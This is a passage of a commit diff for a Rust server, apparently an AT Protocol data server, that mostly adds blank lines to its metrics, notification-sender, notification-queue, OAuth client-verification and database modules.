tokio::signal::ctrl_c().await { ··· 112 138 } 113 139 } 114 140 }; 141 + 115 142 #[cfg(unix)] 116 143 let terminate = async { 117 144 match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) { ··· 124 151 } 125 152 } 126 153 }; 154 + 127 155 #[cfg(not(unix))] 128 156 let terminate = std::future::pending::<()>(); 157 + 129 158 tokio::select! { 130 159 _ = ctrl_c => {}, 131 160 _ = terminate => {}, 132 161 } 162 + 133 163 info!("Shutdown signal received, stopping services..."); 134 164 shutdown_tx.send(true).ok(); 135 165 }
+28
src/metrics.rs
··· 8 8 use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle}; 9 9 use std::sync::OnceLock; 10 10 use std::time::Instant; 11 + 11 12 static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new(); 13 + 12 14 pub fn init_metrics() -> PrometheusHandle { 13 15 let builder = PrometheusBuilder::new(); 14 16 let handle = builder 15 17 .install_recorder() 16 18 .expect("failed to install Prometheus recorder"); 19 + 17 20 PROMETHEUS_HANDLE.set(handle.clone()).ok(); 18 21 describe_metrics(); 22 + 19 23 handle 20 24 } 25 + 21 26 fn describe_metrics() { 22 27 metrics::describe_counter!( 23 28 "bspds_http_requests_total", ··· 68 73 "Database query duration in seconds" 69 74 ); 70 75 } 76 + 71 77 pub async fn metrics_handler() -> impl IntoResponse { 72 78 match PROMETHEUS_HANDLE.get() { 73 79 Some(handle) => { ··· 81 87 ), 82 88 } 83 89 } 90 + 84 91 pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response { 85 92 let start = Instant::now(); 86 93 let method = request.method().to_string(); 87 94 let path = normalize_path(request.uri().path()); 95 + 88 96 let response = next.run(request).await; 97 + 89 98 let duration = start.elapsed().as_secs_f64(); 90 99 let status = response.status().as_u16().to_string(); 100 + 91 101 counter!( 92 102 "bspds_http_requests_total", 93 103 "method" => method.clone(), ··· 95 105 "status" => status.clone() 96 106 ) 97 107 .increment(1); 108 + 98 109 histogram!( 99 110 "bspds_http_request_duration_seconds", 100 111 "method" => method, 101 112 "path" => path 102 113 ) 103 114 .record(duration); 115 + 104 116 response 105 117 } 118 + 106 119 fn normalize_path(path: &str) -> String { 107 120 if path.starts_with("/xrpc/") { 108 121 if let Some(method) = path.strip_prefix("/xrpc/") { ··· 112 125 return path.to_string(); 113 126 } 114 127 } 128 + 115 129 if path.starts_with("/u/") && path.ends_with("/did.json") { 116 130 return "/u/{handle}/did.json".to_string(); 117 131 } 132 + 118 133 if path.starts_with("/oauth/") { 119 134 return path.to_string(); 120 135 } 136 + 121 137 path.to_string() 122 138 } 139 + 123 140 pub fn record_auth_cache_hit(cache_type: &str) { 124 141 counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1); 125 142 } 143 + 126 144 pub fn record_auth_cache_miss(cache_type: &str) { 127 145 counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1); 128 146 } 147 + 129 148 pub fn set_firehose_subscribers(count: usize) { 130 149 gauge!("bspds_firehose_subscribers").set(count as f64); 131 150 } 151 + 132 152 pub fn increment_firehose_subscribers() { 133 153 counter!("bspds_firehose_events_total").increment(1); 134 154 } 155 + 135 156 pub fn record_firehose_event() { 136 157 counter!("bspds_firehose_events_total").increment(1); 137 158 } 159 + 138 160 pub fn record_block_operation(op_type: &str) { 139 161 counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1); 140 162 } 163 + 141 164 pub fn record_s3_operation(op_type: &str, status: &str) { 142 165 counter!( 143 166 "bspds_s3_operations_total", ··· 146 169 ) 147 170 .increment(1); 148 171 } 172 + 149 173 pub fn set_notification_queue_size(size: usize) { 150 174 gauge!("bspds_notification_queue_size").set(size as f64); 151 175 } 176 + 152 177 pub fn record_rate_limit_rejection(limiter: &str) { 153 178 counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1); 154 179 } 180 + 155 181 pub fn record_db_query(query_type: &str, duration_seconds: f64) { 156 182 counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1); 157 183 histogram!( ··· 160 186 ) 161 187 .record(duration_seconds); 162 188 } 189 + 163 190 #[cfg(test)] 164 191 mod tests { 165 192 use super::*; 193 + 166 194 #[test] 167 195 fn test_normalize_path() { 168 196 assert_eq!(
+3
src/notifications/mod.rs
··· 1 1 mod sender; 2 2 mod service; 3 3 mod types; 4 + 4 5 pub use sender::{ 5 6 DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender, 6 7 is_valid_phone_number, sanitize_header_value, 7 8 }; 9 + 8 10 pub use service::{ 9 11 channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update, 10 12 enqueue_email_verification, enqueue_notification, enqueue_password_reset, 11 13 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService, 12 14 }; 15 + 13 16 pub use types::{ 14 17 NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification, 15 18 };
+30
src/notifications/sender.rs
··· 5 5 use std::time::Duration; 6 6 use tokio::io::AsyncWriteExt; 7 7 use tokio::process::Command; 8 + 8 9 use super::types::{NotificationChannel, QueuedNotification}; 10 + 9 11 const HTTP_TIMEOUT_SECS: u64 = 30; 10 12 const MAX_RETRIES: u32 = 3; 11 13 const INITIAL_RETRY_DELAY_MS: u64 = 500; 14 + 12 15 #[async_trait] 13 16 pub trait NotificationSender: Send + Sync { 14 17 fn channel(&self) -> NotificationChannel; 15 18 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>; 16 19 } 20 + 17 21 #[derive(Debug, thiserror::Error)] 18 22 pub enum SendError { 19 23 #[error("Failed to spawn sendmail process: {0}")] ··· 31 35 #[error("Max retries exceeded: {0}")] 32 36 MaxRetriesExceeded(String), 33 37 } 38 + 34 39 fn create_http_client() -> Client { 35 40 Client::builder() 36 41 .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS)) ··· 38 43 .build() 39 44 .unwrap_or_else(|_| Client::new()) 40 45 } 46 + 41 47 fn is_retryable_status(status: reqwest::StatusCode) -> bool { 42 48 status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS 43 49 } 50 + 44 51 async fn retry_delay(attempt: u32) { 45 52 let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt); 46 53 tokio::time::sleep(Duration::from_millis(delay_ms)).await; 47 54 } 55 + 48 56 pub fn sanitize_header_value(value: &str) -> String { 49 57 value.replace(['\r', '\n'], " ").trim().to_string() 50 58 } 59 + 51 60 pub fn is_valid_phone_number(number: &str) -> bool { 52 61 if number.len() < 2 || number.len() > 20 { 53 62 return false; ··· 59 68 let remaining: String = chars.collect(); 60 69 !remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit()) 61 70 } 71 + 62 72 pub struct EmailSender { 63 73 from_address: String, 64 74 from_name: String, 65 75 sendmail_path: String, 66 76 } 77 + 67 78 impl EmailSender { 68 79 pub fn new(from_address: String, from_name: String) -> Self { 69 80 Self { ··· 72 83 sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()), 73 84 } 74 85 } 86 + 75 87 pub fn from_env() -> Option<Self> { 76 88 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 77 89 let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string()); 78 90 Some(Self::new(from_address, from_name)) 79 91 } 92 + 80 93 pub fn format_email(&self, notification: &QueuedNotification) -> String { 81 94 let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 82 95 let recipient = sanitize_header_value(&notification.recipient); ··· 94 107 ) 95 108 } 96 109 } 110 + 97 111 #[async_trait] 98 112 impl NotificationSender for EmailSender { 99 113 fn channel(&self) -> NotificationChannel { 100 114 NotificationChannel::Email 101 115 } 116 + 102 117 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 103 118 let email_content = self.format_email(notification); 104 119 let mut child = Command::new(&self.sendmail_path) ··· 119 134 Ok(()) 120 135 } 121 136 } 137 + 122 138 pub struct DiscordSender { 123 139 webhook_url: String, 124 140 http_client: Client, 125 141 } 142 + 126 143 impl DiscordSender { 127 144 pub fn new(webhook_url: String) -> Self { 128 145 Self { ··· 130 147 http_client: create_http_client(), 131 148 } 132 149 } 150 + 133 151 pub fn from_env() -> Option<Self> { 134 152 let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?; 135 153 Some(Self::new(webhook_url)) 136 154 } 137 155 } 156 + 138 157 #[async_trait] 139 158 impl NotificationSender for DiscordSender { 140 159 fn channel(&self) -> NotificationChannel { 141 160 NotificationChannel::Discord 142 161 } 162 + 143 163 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 144 164 let subject = notification.subject.as_deref().unwrap_or("Notification"); 145 165 let content = format!("**{}**\n\n{}", subject, notification.body); ··· 193 213 )) 194 214 } 195 215 } 216 + 196 217 pub struct TelegramSender { 197 218 bot_token: String, 198 219 http_client: Client, 199 220 } 221 + 200 222 impl TelegramSender { 201 223 pub fn new(bot_token: String) -> Self { 202 224 Self { ··· 204 226 http_client: create_http_client(), 205 227 } 206 228 } 229 + 207 230 pub fn from_env() -> Option<Self> { 208 231 let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?; 209 232 Some(Self::new(bot_token)) 210 233 } 211 234 } 235 + 212 236 #[async_trait] 213 237 impl NotificationSender for TelegramSender { 214 238 fn channel(&self) -> NotificationChannel { 215 239 NotificationChannel::Telegram 216 240 } 241 + 217 242 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 218 243 let chat_id = &notification.recipient; 219 244 let subject = notification.subject.as_deref().unwrap_or("Notification"); ··· 273 298 )) 274 299 } 275 300 } 301 + 276 302 pub struct SignalSender { 277 303 signal_cli_path: String, 278 304 sender_number: String, 279 305 } 306 + 280 307 impl SignalSender { 281 308 pub fn new(signal_cli_path: String, sender_number: String) -> Self { 282 309 Self { ··· 284 311 sender_number, 285 312 } 286 313 } 314 + 287 315 pub fn from_env() -> Option<Self> { 288 316 let signal_cli_path = std::env::var("SIGNAL_CLI_PATH") 289 317 .unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string()); ··· 291 319 Some(Self::new(signal_cli_path, sender_number)) 292 320 } 293 321 } 322 + 294 323 #[async_trait] 295 324 impl NotificationSender for SignalSender { 296 325 fn channel(&self) -> NotificationChannel { 297 326 NotificationChannel::Signal 298 327 } 328 + 299 329 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 300 330 let recipient = &notification.recipient; 301 331 if !is_valid_phone_number(recipient) {
+27
src/notifications/service.rs
··· 1 1 use std::collections::HashMap; 2 2 use std::sync::Arc; 3 3 use std::time::Duration; 4 + 4 5 use chrono::Utc; 5 6 use sqlx::PgPool; 6 7 use tokio::sync::watch; 7 8 use tokio::time::interval; 8 9 use tracing::{debug, error, info, warn}; 9 10 use uuid::Uuid; 11 + 10 12 use super::sender::{NotificationSender, SendError}; 11 13 use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification}; 14 + 12 15 pub struct NotificationService { 13 16 db: PgPool, 14 17 senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>, 15 18 poll_interval: Duration, 16 19 batch_size: i64, 17 20 } 21 + 18 22 impl NotificationService { 19 23 pub fn new(db: PgPool) -> Self { 20 24 let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS") ··· 32 36 batch_size, 33 37 } 34 38 } 39 + 35 40 pub fn with_poll_interval(mut self, interval: Duration) -> Self { 36 41 self.poll_interval = interval; 37 42 self 38 43 } 44 + 39 45 pub fn with_batch_size(mut self, size: i64) -> Self { 40 46 self.batch_size = size; 41 47 self 42 48 } 49 + 43 50 pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self { 44 51 self.senders.insert(sender.channel(), Arc::new(sender)); 45 52 self 46 53 } 54 + 47 55 pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 48 56 let id = sqlx::query_scalar!( 49 57 r#" ··· 65 73 debug!(notification_id = %id, "Notification enqueued"); 66 74 Ok(id) 67 75 } 76 + 68 77 pub fn has_senders(&self) -> bool { 69 78 !self.senders.is_empty() 70 79 } 80 + 71 81 pub async fn run(self, mut shutdown: watch::Receiver<bool>) { 72 82 if self.senders.is_empty() { 73 83 warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured."); ··· 95 105 } 96 106 } 97 107 } 108 + 98 109 async fn process_batch(&self) -> Result<(), sqlx::Error> { 99 110 let notifications = self.fetch_pending_notifications().await?; 100 111 if notifications.is_empty() { ··· 106 117 } 107 118 Ok(()) 108 119 } 120 + 109 121 async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> { 110 122 let now = Utc::now(); 111 123 sqlx::query_as!( ··· 137 149 .fetch_all(&self.db) 138 150 .await 139 151 } 152 + 140 153 async fn process_notification(&self, notification: QueuedNotification) { 141 154 let notification_id = notification.id; 142 155 let channel = notification.channel; ··· 179 192 } 180 193 } 181 194 } 195 + 182 196 async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> { 183 197 sqlx::query!( 184 198 r#" ··· 192 206 .await?; 193 207 Ok(()) 194 208 } 209 + 195 210 async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> { 196 211 sqlx::query!( 197 212 r#" ··· 215 230 Ok(()) 216 231 } 217 232 } 233 + 218 234 pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 219 235 sqlx::query_scalar!( 220 236 r#" ··· 234 250 .fetch_one(db) 235 251 .await 236 252 } 253 + 237 254 pub struct UserNotificationPrefs { 238 255 pub channel: NotificationChannel, 239 256 pub email: Option<String>, 240 257 pub handle: String, 241 258 } 259 + 242 260 pub async fn get_user_notification_prefs( 243 261 db: &PgPool, 244 262 user_id: Uuid, ··· 262 280 handle: row.handle, 263 281 }) 264 282 } 283 + 265 284 pub async fn enqueue_welcome( 266 285 db: &PgPool, 267 286 user_id: Uuid, ··· 285 304 ) 286 305 .await 287 306 } 307 + 288 308 pub async fn enqueue_email_verification( 289 309 db: &PgPool, 290 310 user_id: Uuid, ··· 309 329 ) 310 330 .await 311 331 } 332 + 312 333 pub async fn enqueue_password_reset( 313 334 db: &PgPool, 314 335 user_id: Uuid, ··· 333 354 ) 334 355 .await 335 356 } 357 + 336 358 pub async fn enqueue_email_update( 337 359 db: &PgPool, 338 360 user_id: Uuid, ··· 357 379 ) 358 380 .await 359 381 } 382 + 360 383 pub async fn enqueue_account_deletion( 361 384 db: &PgPool, 362 385 user_id: Uuid, ··· 381 404 ) 382 405 .await 383 406 } 407 + 384 408 pub async fn enqueue_plc_operation( 385 409 db: &PgPool, 386 410 user_id: Uuid, ··· 405 429 ) 406 430 .await 407 431 } 432 + 408 433 pub async fn enqueue_2fa_code( 409 434 db: &PgPool, 410 435 user_id: Uuid, ··· 429 454 ) 430 455 .await 431 456 } 457 + 432 458 pub fn channel_display_name(channel: NotificationChannel) -> &'static str { 433 459 match channel { 434 460 NotificationChannel::Email => "email", ··· 437 463 NotificationChannel::Signal => "Signal", 438 464 } 439 465 } 466 + 440 467 pub async fn enqueue_signup_verification( 441 468 db: &PgPool, 442 469 user_id: Uuid,
+7
src/notifications/types.rs
··· 2 2 use serde::{Deserialize, Serialize}; 3 3 use sqlx::FromRow; 4 4 use uuid::Uuid; 5 + 5 6 #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)] 6 7 #[sqlx(type_name = "notification_channel", rename_all = "lowercase")] 7 8 pub enum NotificationChannel { ··· 10 11 Telegram, 11 12 Signal, 12 13 } 14 + 13 15 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 14 16 #[sqlx(type_name = "notification_status", rename_all = "lowercase")] 15 17 pub enum NotificationStatus { ··· 18 20 Sent, 19 21 Failed, 20 22 } 23 + 21 24 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 22 25 #[sqlx(type_name = "notification_type", rename_all = "snake_case")] 23 26 pub enum NotificationType { ··· 30 33 PlcOperation, 31 34 TwoFactorCode, 32 35 } 36 + 33 37 #[derive(Debug, Clone, FromRow)] 34 38 pub struct QueuedNotification { 35 39 pub id: Uuid, ··· 49 53 pub scheduled_for: DateTime<Utc>, 50 54 pub processed_at: Option<DateTime<Utc>>, 51 55 } 56 + 52 57 pub struct NewNotification { 53 58 pub user_id: Uuid, 54 59 pub channel: NotificationChannel, ··· 58 63 pub body: String, 59 64 pub metadata: Option<serde_json::Value>, 60 65 } 66 + 61 67 impl NewNotification { 62 68 pub fn new( 63 69 user_id: Uuid, ··· 77 83 metadata: None, 78 84 } 79 85 } 86 + 80 87 pub fn email( 81 88 user_id: Uuid, 82 89 notification_type: NotificationType,
+22
src/oauth/client.rs
··· 3 3 use std::collections::HashMap; 4 4 use std::sync::Arc; 5 5 use tokio::sync::RwLock; 6 + 6 7 use super::OAuthError; 8 + 7 9 #[derive(Debug, Clone, Serialize, Deserialize)] 8 10 pub struct ClientMetadata { 9 11 pub client_id: String, ··· 31 33 #[serde(skip_serializing_if = "Option::is_none")] 32 34 pub application_type: Option<String>, 33 35 } 36 + 34 37 impl Default for ClientMetadata { 35 38 fn default() -> Self { 36 39 Self { ··· 50 53 } 51 54 } 52 55 } 56 + 53 57 #[derive(Clone)] 54 58 pub struct ClientMetadataCache { 55 59 cache: Arc<RwLock<HashMap<String, CachedMetadata>>>, ··· 57 61 http_client: Client, 58 62 cache_ttl_secs: u64, 59 63 } 64 + 60 65 struct CachedMetadata { 61 66 metadata: ClientMetadata, 62 67 cached_at: std::time::Instant, 63 68 } 69 + 64 70 struct CachedJwks { 65 71 jwks: serde_json::Value, 66 72 cached_at: std::time::Instant, 67 73 } 74 + 68 75 impl ClientMetadataCache { 69 76 pub fn new(cache_ttl_secs: u64) -> Self { 70 77 Self { ··· 78 85 cache_ttl_secs, 79 86 } 80 87 } 88 + 81 89 pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 82 90 { 83 91 let cache = self.cache.read().await; ··· 100 108 } 101 109 Ok(metadata) 102 110 } 111 + 103 112 pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> { 104 113 if let Some(jwks) = &metadata.jwks { 105 114 return Ok(jwks.clone()); ··· 130 139 } 131 140 Ok(jwks) 132 141 } 142 + 133 143 async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> { 134 144 if !jwks_uri.starts_with("https://") { 135 145 if !jwks_uri.starts_with("http://") ··· 166 176 } 167 177 Ok(jwks) 168 178 } 179 + 169 180 async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 170 181 if !client_id.starts_with("http://") && !client_id.starts_with("https://") { 171 182 return Err(OAuthError::InvalidClient( ··· 207 218 self.validate_metadata(&metadata)?; 208 219 Ok(metadata) 209 220 } 221 + 210 222 fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> { 211 223 if metadata.redirect_uris.is_empty() { 212 224 return Err(OAuthError::InvalidClient( ··· 232 244 } 233 245 Ok(()) 234 246 } 247 + 235 248 pub fn validate_redirect_uri( 236 249 &self, 237 250 metadata: &ClientMetadata, ··· 244 257 } 245 258 Ok(()) 246 259 } 260 + 247 261 fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> { 248 262 if uri.contains('#') { 249 263 return Err(OAuthError::InvalidClient( ··· 278 292 Ok(()) 279 293 } 280 294 } 295 + 281 296 impl ClientMetadata { 282 297 pub fn requires_dpop(&self) -> bool { 283 298 self.dpop_bound_access_tokens.unwrap_or(false) 284 299 } 300 + 285 301 pub fn auth_method(&self) -> &str { 286 302 self.token_endpoint_auth_method 287 303 .as_deref() 288 304 .unwrap_or("none") 289 305 } 290 306 } 307 + 291 308 pub async fn verify_client_auth( 292 309 cache: &ClientMetadataCache, 293 310 metadata: &ClientMetadata, ··· 321 338 ))), 322 339 } 323 340 } 341 + 324 342 async fn verify_private_key_jwt_async( 325 343 cache: &ClientMetadataCache, 326 344 metadata: &ClientMetadata, ··· 425 443 "client_assertion signature verification failed".to_string(), 426 444 )) 427 445 } 446 + 428 447 fn verify_es256( 429 448 key: &serde_json::Value, 430 449 signing_input: &str, ··· 456 475 .verify(signing_input.as_bytes(), &sig) 457 476 .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string())) 458 477 } 478 + 459 479 fn verify_es384( 460 480 key: &serde_json::Value, 461 481 signing_input: &str, ··· 487 507 .verify(signing_input.as_bytes(), &sig) 488 508 .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string())) 489 509 } 510 + 490 511 fn verify_rsa( 491 512 _alg: &str, 492 513 _key: &serde_json::Value, ··· 497 518 "RSA signature verification not yet supported - use EC keys".to_string(), 498 519 )) 499 520 } 521 + 500 522 fn verify_eddsa( 501 523 key: &serde_json::Value, 502 524 signing_input: &str,
+2
src/oauth/db/client.rs
··· 1 1 use sqlx::PgPool; 2 2 use super::super::{AuthorizedClientData, OAuthError}; 3 3 use super::helpers::{from_json, to_json}; 4 + 4 5 pub async fn upsert_authorized_client( 5 6 pool: &PgPool, 6 7 did: &str, ··· 22 23 .await?; 23 24 Ok(()) 24 25 } 26 + 25 27 pub async fn get_authorized_client( 26 28 pool: &PgPool, 27 29 did: &str,
+8
src/oauth/db/device.rs
··· 1 1 use chrono::{DateTime, Utc}; 2 2 use sqlx::PgPool; 3 3 use super::super::{DeviceData, OAuthError}; 4 + 4 5 pub struct DeviceAccountRow { 5 6 pub did: String, 6 7 pub handle: String, 7 8 pub email: Option<String>, 8 9 pub last_used_at: DateTime<Utc>, 9 10 } 11 + 10 12 pub async fn create_device( 11 13 pool: &PgPool, 12 14 device_id: &str, ··· 27 29 .await?; 28 30 Ok(()) 29 31 } 32 + 30 33 pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> { 31 34 let row = sqlx::query!( 32 35 r#" ··· 45 48 last_seen_at: r.last_seen_at, 46 49 })) 47 50 } 51 + 48 52 pub async fn update_device_last_seen( 49 53 pool: &PgPool, 50 54 device_id: &str, ··· 61 65 .await?; 62 66 Ok(()) 63 67 } 68 + 64 69 pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> { 65 70 sqlx::query!( 66 71 r#" ··· 72 77 .await?; 73 78 Ok(()) 74 79 } 80 + 75 81 pub async fn upsert_account_device( 76 82 pool: &PgPool, 77 83 did: &str, ··· 90 96 .await?; 91 97 Ok(()) 92 98 } 99 + 93 100 pub async fn get_device_accounts( 94 101 pool: &PgPool, 95 102 device_id: &str, ··· 118 125 }) 119 126 .collect()) 120 127 } 128 + 121 129 pub async fn verify_account_on_device( 122 130 pool: &PgPool, 123 131 device_id: &str,
+2
src/oauth/db/dpop.rs
··· 1 1 use sqlx::PgPool; 2 2 use super::super::OAuthError; 3 + 3 4 pub async fn check_and_record_dpop_jti( 4 5 pool: &PgPool, 5 6 jti: &str, ··· 16 17 .await?; 17 18 Ok(result.rows_affected() > 0) 18 19 } 20 + 19 21 pub async fn cleanup_expired_dpop_jtis( 20 22 pool: &PgPool, 21 23 max_age_secs: i64,
+2
src/oauth/db/helpers.rs
··· 1 1 use serde::{de::DeserializeOwned, Serialize}; 2 2 use super::super::OAuthError; 3 + 3 4 pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> { 4 5 serde_json::to_value(value).map_err(|e| { 5 6 tracing::error!("JSON serialization error: {}", e); 6 7 OAuthError::ServerError("Internal serialization error".to_string()) 7 8 }) 8 9 } 10 + 9 11 pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> { 10 12 serde_json::from_value(value).map_err(|e| { 11 13 tracing::error!("JSON deserialization error: {}", e);
+1
src/oauth/db/mod.rs
··· 5 5 mod request; 6 6 mod token; 7 7 mod two_factor; 8 + 8 9 pub use client::{get_authorized_client, upsert_authorized_client}; 9 10 pub use device::{ 10 11 create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
+6
src/oauth/db/request.rs
··· 1 1 use sqlx::PgPool; 2 2 use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData}; 3 3 use super::helpers::{from_json, to_json}; 4 + 4 5 pub async fn create_authorization_request( 5 6 pool: &PgPool, 6 7 request_id: &str, ··· 30 31 .await?; 31 32 Ok(()) 32 33 } 34 + 33 35 pub async fn get_authorization_request( 34 36 pool: &PgPool, 35 37 request_id: &str, ··· 64 66 None => Ok(None), 65 67 } 66 68 } 69 + 67 70 pub async fn update_authorization_request( 68 71 pool: &PgPool, 69 72 request_id: &str, ··· 86 89 .await?; 87 90 Ok(()) 88 91 } 92 + 89 93 pub async fn consume_authorization_request_by_code( 90 94 pool: &PgPool, 91 95 code: &str, ··· 120 124 None => Ok(None), 121 125 } 122 126 } 127 + 123 128 pub async fn delete_authorization_request( 124 129 pool: &PgPool, 125 130 request_id: &str, ··· 134 139 .await?; 135 140 Ok(()) 136 141 } 142 + 137 143 pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> { 138 144 let result = sqlx::query!( 139 145 r#"
+12
src/oauth/db/token.rs
··· 2 2 use sqlx::PgPool; 3 3 use super::super::{OAuthError, TokenData}; 4 4 use super::helpers::{from_json, to_json}; 5 + 5 6 pub async fn create_token( 6 7 pool: &PgPool, 7 8 data: &TokenData, ··· 34 35 .await?; 35 36 Ok(row.id) 36 37 } 38 + 37 39 pub async fn get_token_by_id( 38 40 pool: &PgPool, 39 41 token_id: &str, ··· 68 70 None => Ok(None), 69 71 } 70 72 } 73 + 71 74 pub async fn get_token_by_refresh_token( 72 75 pool: &PgPool, 73 76 refresh_token: &str, ··· 105 108 None => Ok(None), 106 109 } 107 110 } 111 + 108 112 pub async fn rotate_token( 109 113 pool: &PgPool, 110 114 old_db_id: i32, ··· 149 153 tx.commit().await?; 150 154 Ok(()) 151 155 } 156 + 152 157 pub async fn check_refresh_token_used( 153 158 pool: &PgPool, 154 159 refresh_token: &str, ··· 163 168 .await?; 164 169 Ok(row) 165 170 } 171 + 166 172 pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> { 167 173 sqlx::query!( 168 174 r#" ··· 174 180 .await?; 175 181 Ok(()) 176 182 } 183 + 177 184 pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> { 178 185 sqlx::query!( 179 186 r#" ··· 185 192 .await?; 186 193 Ok(()) 187 194 } 195 + 188 196 pub async fn list_tokens_for_user( 189 197 pool: &PgPool, 190 198 did: &str, ··· 220 228 } 221 229 Ok(tokens) 222 230 } 231 + 223 232 pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> { 224 233 let count = sqlx::query_scalar!( 225 234 r#" ··· 231 240 .await?; 232 241 Ok(count) 233 242 } 243 + 234 244 pub async fn delete_oldest_tokens_for_user( 235 245 pool: &PgPool, 236 246 did: &str, ··· 253 263 .await?; 254 264 Ok(result.rows_affected()) 255 265 } 266 + 256 267 const MAX_TOKENS_PER_USER: i64 = 100; 268 + 257 269 pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> { 258 270 let count = count_tokens_for_user(pool, did).await?; 259 271 if count > MAX_TOKENS_PER_USER {
+9
src/oauth/db/two_factor.rs
··· 3 3 use sqlx::PgPool; 4 4 use uuid::Uuid; 5 5 use super::super::OAuthError; 6 + 6 7 pub struct TwoFactorChallenge { 7 8 pub id: Uuid, 8 9 pub did: String, ··· 12 13 pub created_at: DateTime<Utc>, 13 14 pub expires_at: DateTime<Utc>, 14 15 } 16 + 15 17 pub fn generate_2fa_code() -> String { 16 18 let mut rng = rand::thread_rng(); 17 19 let code: u32 = rng.gen_range(0..1_000_000); 18 20 format!("{:06}", code) 19 21 } 22 + 20 23 pub async fn create_2fa_challenge( 21 24 pool: &PgPool, 22 25 did: &str, ··· 47 50 expires_at: row.expires_at, 48 51 }) 49 52 } 53 + 50 54 pub async fn get_2fa_challenge( 51 55 pool: &PgPool, 52 56 request_uri: &str, ··· 71 75 expires_at: r.expires_at, 72 76 })) 73 77 } 78 + 74 79 pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> { 75 80 let row = sqlx::query!( 76 81 r#" ··· 85 90 .await?; 86 91 Ok(row.attempts) 87 92 } 93 + 88 94 pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> { 89 95 sqlx::query!( 90 96 r#" ··· 96 102 .await?; 97 103 Ok(()) 98 104 } 105 + 99 106 pub async fn delete_2fa_challenge_by_request_uri( 100 107 pool: &PgPool, 101 108 request_uri: &str, ··· 110 117 .await?; 111 118 Ok(()) 112 119 } 120 + 113 121 pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> { 114 122 let result = sqlx::query!( 115 123 r#" ··· 120 128 .await?; 121 129 Ok(result.rows_affected()) 122 130 } 131 + 123 132 pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> { 124 133 let row = sqlx::query!( 125 134 r#"
+20
src/oauth/dpop.rs
